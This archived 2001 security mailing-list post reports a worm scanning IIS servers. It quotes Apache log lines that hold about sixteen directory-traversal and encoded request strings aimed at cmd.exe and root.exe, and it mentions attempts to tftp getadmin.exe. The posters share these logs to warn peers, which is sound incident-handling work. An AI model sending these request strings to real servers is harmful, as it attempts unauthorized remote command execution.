In addition to this, we are seeing attempts to tftp getadmin.exe. What is going on here. It started at 9:20 am and there are some 20,000 alarms on the IDS. Ed --- Cory McIntire <coryat_private> wrote: > Hello, > I and a few others I know are getting bombard on our > machines with IIS > requests....looks like another worm, and its much > smarter than before, it > seems to stay within the same class A and sometimes > the same class B as the > attacking machine is in. here is an excerpt of what > i believe is the full > scan.... > > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > /MSADC/root.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:12 -0500] "GET > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir > > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:14 -0500] "GET > /scripts/root.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:16 -0500] "GET > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:19 -0500] "GET > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 400 215 "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:22 -0500] "GET > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 400 215 "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 204.120.69.195 - - [18/Sep/2001:09:35:23 -0500] "GET > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > > just thought I would let you guys know...this one > looks bad fella.....thank > god for apache.....that is of course, if there isnt > a huge bog down on the > net....=[ > > cory > > ----------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS > analyzer service. > For more information on this free incident handling, > management > and tracking system please see: > http://aris.securityfocus.com > __________________________________________________ Terrorist Attacks on U.S. - How can you help? Donate cash, emergency relief information http://dailynews.yahoo.com/fc/US/Emergency_Information/ ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:15:37 PDT